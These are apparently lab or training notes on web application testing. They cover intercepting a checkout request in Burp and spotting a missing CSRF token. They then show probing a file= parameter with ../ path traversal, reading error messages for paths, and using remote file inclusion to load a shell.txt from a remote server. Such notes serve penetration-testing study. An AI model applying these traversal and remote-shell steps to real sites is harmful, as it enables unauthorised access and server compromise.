Professional Documents
Culture Documents
intercept with burpe and send checkout request to decoder since there's some encoding:
→ now forward request to see what happens – note doesn't appear to be any token in request that
would limit cross-site request forgery;
Upload a test file and see the file= parameter which is first injection point:
if file= parameter is not sanitised, attacker could gain access to arbitrary files:
use ../ to go up the file system tree. Try one at a time; we don't know how many we have to go up
by.
Also, test for errors by using filename that won't exist. Errors can be very useful:
→ in this warning, the full path we are after is at the end of the warning;
but if we have no error then we have to guess how many ../ locations we have to add to reach root:
once we are in root directory, all other ../ will be ignored. So use enough to guarantee that we will
be in root directory:
directing file=google.com and google page showing shows this parameter is vulnerable to remote
file inclusion:
now edit payload to include shell on target server: e.g. shell.txt; the shell.txt file should be located
on remote server: